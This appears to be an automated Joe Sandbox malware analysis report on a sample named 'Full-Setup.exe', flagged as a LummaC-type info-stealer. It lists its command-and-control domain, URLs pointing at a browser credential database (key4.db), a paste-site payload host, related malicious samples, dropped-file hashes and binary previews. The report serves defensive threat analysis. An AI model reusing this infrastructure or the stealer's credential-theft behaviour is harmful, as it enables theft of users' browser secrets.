                                                                                                            https://ac.ecosia.org/autocomplete?q=Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgGlow.com, 0000000A.00000003.2262928409.000000000488C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://rentry.co/powershell.exe, 0000000F.00000002.2395086529.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2395086529.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp, 4VQOL9Z4BW428506NY343FUN.ps1.10.drfalse
                                                                                                                  high
                                                                                                                  https://kitteprincv.click:443/api4p.default-release/key4.dbPKGlow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://support.microsofGlow.com, 0000000A.00000003.2215505651.0000000004922000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?Glow.com, 0000000A.00000003.2261523339.0000000004919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesGlow.com, 0000000A.00000003.2215604698.0000000001750000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Glow.com, 0000000A.00000003.2215097988.000000000491C000.00000004.00000800.00020000.00000000.sdmp, Glow.com, 0000000A.00000003.2215232746.0000000001763000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://kitteprincv.click:443/apitxtPKGlow.com, 0000000A.00000002.2492761826.00000000014E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://kitteprincv.click/pia)Glow.com, 0000000A.00000002.2492595373.0000000001388000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs
                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                104.26.3.16
                                                                                                                                rentry.coUnited States
                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                104.21.43.127
                                                                                                                                kitteprincv.clickUnited States
                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1579282
                                                                                                                                Start date and time:2024-12-21 13:00:23 +01:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 7m 20s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Run name:Run with higher sleep bypass
                                                                                                                                Number of analysed new started processes analysed:18
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:Full-Setup.exe
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@25/27@3/2
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 98%
                                                                                                                                • Number of executed functions: 75
                                                                                                                                • Number of non-executed functions: 307
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 8088 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                No simulations
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                104.26.3.16file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                  grA6aqodO5.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                    SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exeGet hashmaliciousXWormBrowse
                                                                                                                                      nkYzjyrKYK.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                        R6IuO0fzec.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                          FluxusV2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                                                            egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                                                                                                              SecuriteInfo.com.Win64.TrojanX-gen.20834.9882.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                4wx72yFLka.exeGet hashmaliciousPython Stealer, CStealer, ChaosBrowse
                                                                                                                                                  quotation.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                    104.21.43.127http://howtomule.comGet hashmaliciousUnknownBrowse
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      rentry.coSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                                      • 104.26.2.16
                                                                                                                                                      file.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      bUAmCazc.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.26.2.16
                                                                                                                                                      IaslcsMo.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      IaslcsMo.txt.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 172.67.75.40
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      CLOUDFLARENETUSjqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.90.205
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.84.113
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.42.70
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.191.144
                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.6.74
                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                      • 172.69.220.163
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                      • 104.21.67.146
                                                                                                                                                      Oggq2dY6kx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                      • 104.21.52.219
                                                                                                                                                      CLOUDFLARENETUSjqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.21.90.205
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.84.113
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.42.70
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 172.67.191.144
                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.21.80.1
                                                                                                                                                      Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.21.6.74
                                                                                                                                                      mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                      • 172.69.220.163
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                      • 104.21.67.146
                                                                                                                                                      Oggq2dY6kx.exeGet hashmaliciousAzorultBrowse
                                                                                                                                                      • 104.21.52.219
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      Set-up!.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      L82esnUTxK.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.26.3.16
                                                                                                                                                      • 104.21.43.127
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\600044\Glow.comSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
                                                                                                                                                                  Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                      downloaded_exe.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                        Entropy (8bit):0.6599547231656377
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:NlllulRlltl:NllU
                                                                                                                                                                        MD5:2AAC5546A51052C82C51A111418615EB
                                                                                                                                                                        SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                                                                                                                                        SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                                                                                                                                        SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e...........................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (945)
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):5659
                                                                                                                                                                        Entropy (8bit):5.049619748467238
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:5puA5jKEcXrj7uDQgzY5s4x3pBxu05nx/ICu:5p9pcXr2DFzYy4x3pBIunx/ju
                                                                                                                                                                        MD5:95D8B269F5B1971A4C2CFE39673F488E
                                                                                                                                                                        SHA1:62F255FE49B4929EC356EB2E2BEBD3F1EA193F51
                                                                                                                                                                        SHA-256:DA0342BDCA28822D77FCF652D41D5C91095C5AC38BDEFB1B83C072948E4346CC
                                                                                                                                                                        SHA-512:3F10E2C6660F58ABD5D35FD4B5A11583D6739DDD5114268142BEE17967EE3555D3827FCF8A6C2BFE178E0C01D056F86A2F7F10762EBA37741889564D0E9F9493
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>What</title>.<link rel="canonical" href="https://rentry.co/what" />.. .<meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and editing. Fast, simple and free.">.<meta name="keywords" content="paste, markdown, publishing, markdown paste service, markdown from command line">..<meta name="twitter:card" content="summary" />.<meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />.<meta name="twitter:title" content="Rentry.co - Markdown Paste Service" />.<meta name="twitter:site" content="@rentry_co" />.<meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />..<meta property="og:url" content="https://rentry.co/" />.<meta property="og:title" content="Rentry.co - Markdown Paste Service" />.<meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />.<meta p
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: nikDoCvpJa.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: downloaded_exe.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):493459
                                                                                                                                                                        Entropy (8bit):7.999641566722535
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:Yk4vEf/+5J0zSuDveJhxtlCpGZAvC2FNxyvmtECN+1:TeEfmMSeveJRl4GZAvFDsYd+1
                                                                                                                                                                        MD5:FA0CA42ACDEBCD419798E643BE0FA95E
                                                                                                                                                                        SHA1:80A62A4C74114DB4CE61AD3353F96DE70EFED056
                                                                                                                                                                        SHA-256:1DDA17051F0B6374E6C3B90CC1E6DD0CBC630D9030453A4545AB0B9AE3578063
                                                                                                                                                                        SHA-512:EB5F117BCE3A868540B434C50865437DBC6F1352A85CB434ECA8B0AEED02C537CC2EA42BE71A6AE291EB7FA83AA5151679F2B6B0C2D8C885A968569FE537D99F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:...-k...<'.B6...f&5.L.....^(]...t.....YRe4&&n...(.2.0w..(l.R..y.|..;........Bt<...Y..........v....]}.:M...*.....V..."#.|..+.]p.....R.hS.P.Hj.... .q.~....t!.kw..yo.V.p..*.....KP.1..."QI.1..z..w...`.A...... '.U_\{..<|......\_.....`pi6b.T...X......\.......C4..q!......u'..'Rf.bA.8.Y....c.H.i.5..0.#.....k......._.);.[.-....k......q.......+..8..2.y......=..".Q].~..[<.#.c}...p...F..N..^..p.a1..a..).Y.c...zu5..K..]3.......K4.a..r.z.K].#....;Sm.K./b:..?..aG...sZ.(.).2r..=..w\.e|...x7.,|..{....?E....QL.J...........65{\..4s3.k..OO....'.UP.....t.s}.c...f....h.K.g}..=.......-;.B$.@p.t.D...u.?f\...Dr-...,...%.]w.<";.E...F.a+...I.TF.vO..(8..N...D .I...8......8.Eb#f*......7.dG...L.........0...|.5......|'..|..E.c.P.N-.j..l.....K.jE...Fu.!..H?..u....I.I...?.kQ......A..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                        Entropy (8bit):6.695885998053678
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:WU0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/+:WUDQWf05mjccBiqXvpm
                                                                                                                                                                        MD5:522F68DEF464C2EB81E108B361ABF39F
                                                                                                                                                                        SHA1:71067214119F4813555DF7A99C0B975BD3C13475
                                                                                                                                                                        SHA-256:C35FCCD81486D757308DB124DD723C592080A13BF9287767B1B60D80BA2C1119
                                                                                                                                                                        SHA-512:29FF070B9CBD971F30CA4DB1A0C708E3B16772DEA263B3BB2C392E263CDD7C4F6146CB78649CE0D51006AEEB785C6AFEA6896DEE547C3913A34EAE4B08D67A09
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:U.t.......#.=......c....M.9M........},.t..E.;........}..........[......j\Y;.......3.M(.].j\Xf9F.......j.X..;.......j.X;........M...u.j-Xf9F........E...j.Z.E.;.........u.9M.u..M.;...Z...WW.u(.u.U... .............U.u..U.M.E.j._...u...>.}........j]X;........}.........E.9M.w..E..}...u.....}.U..U..U...|....U..U..U.}.....T....],..t..E.+......u.3.;.U.jn...Y..f..j.X..U...u.....Z...j XP.. ...PR."<...U....j .A....X..]......jEYf9N.j\Y.......!...jQYf9N.............M.E..].......]..M..E..U..........u..]..]..]..]..|....]..]..].+.U...j...3.X#.].M.........j#Xj(Yj?Zf9N........N....j+_f;...#...f;...%...........u..U.juX.].f9........}....j.Xf;...!...j.Xf;.......j.Xf;.......j Xf;............]...j4..[.}..j.Yf;.......j.Yf;........M...z..M...E..M..U...te.U...}...U........M........]....M..!j.f..Y.].u.}..t.............f.....;.U.....L....u..}.........M(3..E.E..Ah.....E.......F....U..A@f.A@.].f.B..u..IX.}(.A..GX.}.................;..E(.......H +H....M.3.U.f.:.xh.p@.E,...t.....t....U
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):75776
                                                                                                                                                                        Entropy (8bit):7.997751247043126
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:B2goFlHriY0IInkJ16UgQ+0hV7Vz3ycZOqdEf/UzwWo:YiY0Vkb6USuVzCWdEf/UI
                                                                                                                                                                        MD5:A44FABCED6C7F5BA44B050D31E24B43C
                                                                                                                                                                        SHA1:DF07D82523BE579255754C68A5DDCEA8DCB91367
                                                                                                                                                                        SHA-256:2E8B88F9F420275D4DE1A4B1C7BF3F01970F08CC41563C4A4560BF84A26A4C76
                                                                                                                                                                        SHA-512:70B64D21549588B0D3AE6AE0076B27E4FA8B7E614FEA1A290CA1E83B03494243CACC59B04ED87A041F36AF11CC0365B6BA91507D25792A50872FF0C4C15D8EE9
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:...-k...<'.B6...f&5.L.....^(]...t.....YRe4&&n...(.2.0w..(l.R..y.|..;........Bt<...Y..........v....]}.:M...*.....V..."#.|..+.]p.....R.hS.P.Hj.... .q.~....t!.kw..yo.V.p..*.....KP.1..."QI.1..z..w...`.A...... '.U_\{..<|......\_.....`pi6b.T...X......\.......C4..q!......u'..'Rf.bA.8.Y....c.H.i.5..0.#.....k......._.);.[.-....k......q.......+..8..2.y......=..".Q].~..[<.#.c}...p...F..N..^..p.a1..a..).Y.c...zu5..K..]3.......K4.a..r.z.K].#....;Sm.K./b:..?..aG...sZ.(.).2r..=..w\.e|...x7.,|..{....?E....QL.J...........65{\..4s3.k..OO....'.UP.....t.s}.c...f....h.K.g}..=.......-;.B$.@p.t.D...u.?f\...Dr-...,...%.]w.<";.E...F.a+...I.TF.vO..(8..N...D .I...8......8.Eb#f*......7.dG...L.........0...|.5......|'..|..E.c.P.N-.j..l.....K.jE...Fu.!..H?..u....I.I...?.kQ......A..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):66560
                                                                                                                                                                        Entropy (8bit):6.652383378447268
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:ZXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCT:BF4qv+32eOyKODOSpQSAI
                                                                                                                                                                        MD5:8FCB2CBE8BE5D78A1B7DD127E4021AA2
                                                                                                                                                                        SHA1:EF7394FC927C7E28E83A79702860471BC662336C
                                                                                                                                                                        SHA-256:B6484F2B33AC22F03F5CDA2A2C3B0FC9119E7C6D957CF317DDF1CD298A774D30
                                                                                                                                                                        SHA-512:3C569BA57AC2D63614FCC31AA16593AEE3FD6BB1845D862EC1BDAA4E29277D99274ADCBD6222E56DD669DB631CAE916856975A4A62D696BA72017F626729327C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:-.........f;U.......f;U.s....-f.......f;U.......f;U.s....-P.......f;U.......f;U.s....-.....wf;U.rvf;U.s....- ....af;U.r`f;U.s....-@....Kf;U.rJf;.x...s....-.....2f;.p...r.f;.h...s%...-......f;.`...s....-............u:f9.X...w.f;.P...v.f..f+E.f;E.w.f..f+E.f;E....w... ........;.w(.U..;.t...B.U...E.j0f.......f.U.X.....E.................;..........U..u...f.....f.M...9U.u%j0Zf;.u..u..f..N...f.M...f;.t.u..u.D...j0Xf;.......f;M.s......0.....f;.d.........f;M.......f;M.s....-`........f;M.......f;.H...s....-........f;M.......f;.|...s....-f.......f;M.......f;.\...s....-.....h...f;M...c...f;.t...s....-f....H...f;M...C...f;.L...s....-.....(...f;M...#...f;.l...s....-f........f;M.......f;.T...s....-f........f;M.......f;M.s....-.........f;M.......f;M.s....-f.......f;M.......f;M.s....-P.......f;M.......f;M.s....-.....wf;M.rvf;M.s....- ....af;M.r`f;M.s....-@....Kf;M.rJf;.x...s....-.....2f;.p...r.f;.h...s%...-......f;.`...s....-............u:f9.X...w.f;.P...v.f..f+E.f;E.w.f..f+E.f;E....w...
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):92160
                                                                                                                                                                        Entropy (8bit):7.997984652122233
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:xD7p01nmGhU3zfjDaudFkFvCZaqzjO6xOsHGIIPvRi+xhIgMasc:r0h3hU3zfjZFGvC8RBnPFxX
                                                                                                                                                                        MD5:904587056228893E69E3FBD1E94CB2EE
                                                                                                                                                                        SHA1:8AD8ADDCA2FC562C4E035DD3E89A38AA5F1226D5
                                                                                                                                                                        SHA-256:5894012B5D4A919524673490C3D5F1A6DCC9350E94F25E89EB57ACAABB703970
                                                                                                                                                                        SHA-512:B552519F3A4E31B9E3E27F06AB7CDD3896FB5636473E1756FAEE5D415F038D1BF231A70AEAA314A5D09EE28E275E107B294D15D2BCE22DBBED6A8DBCB6B38AD4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:......-qQ.c.5......;G...=...C...:..XG.\..>.)2.._aS...X..a...L.}]......d.'...'..I.6.'q._....KEg.{.WR.A..x........h.......y.(....y......-.,......y1(...T.c..........\o\.}...T...H.[....ay...s.69d. 7...C..g..c......#=.q.$..f..x..Mx..xm!..s>.B.e..Kk.@Be...K\.w.@....4.5.a.p)..s.....Z&......p..d*.R..>\..LD.|..>...[g.......*I..C.QL......^A....c..{.o|.....Y\...z5.=.y..)...(x}.a~....p-iu.L....u.N7n<.F..L....{]y..b......Q..H.-...........IU0....]F......JtQ..'.6.....j;*'......-...*s.:....."..jp.i.i5.....-...!{.th.VZq..........`....5>..k..~.....,....l..1x![.)..G.M....f..<..kc.`!dY\.v..e..W....=..h.A...5u ,..)..\....suV.......7U\..#..]....0lzE.n...j..~.D.l.'.sj.z....:...`...s&..,...y......w?9........]..C..*.Gs..Zc..!...n........g..t..E.pT..a...u|p...w.x...4:I.t.5.sj.oB.B...>9....*.....%ZT........8.Q..|t~.B..hTI=......V...(Fp:.o.&.....@y.B.s.....v...Y........Tw.r.......F..^...1...8...A.NQ.1.,..9..wWQEb..fO.$.@...C28.._.$r..0In...V./......!...oE..Bz....
                                                                                                                                                                        Process:C:\Users\user\Desktop\Full-Setup.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):150528
                                                                                                                                                                        Entropy (8bit):5.71687144972753
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:VanHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPdKaj6iTcI:VQLeAg0Fuz08XvBNbjaAtsPh6G
                                                                                                                                                                        MD5:8A3C5DA3707B8E6DAEA6E26971745CBF
                                                                                                                                                                        SHA1:CE12AD36191B392A4ACB4D25A17D3239CBEBC6FD
                                                                                                                                                                        SHA-256:2131BEB4568B700267BC3F10BE58CCD30ED1EA72D1CDFC60D2478D02FDBE9766
                                                                                                                                                                        SHA-512:47785652468A0B5DD83C4019673EF1251D5E9BD732195B18EDD350E6024BDB4C67365BADEE940F248C360148A0BBADC2ACCA6E9A7CCA9DA666F257CE9F611373
                                                                                                                                                                        Malicious:false
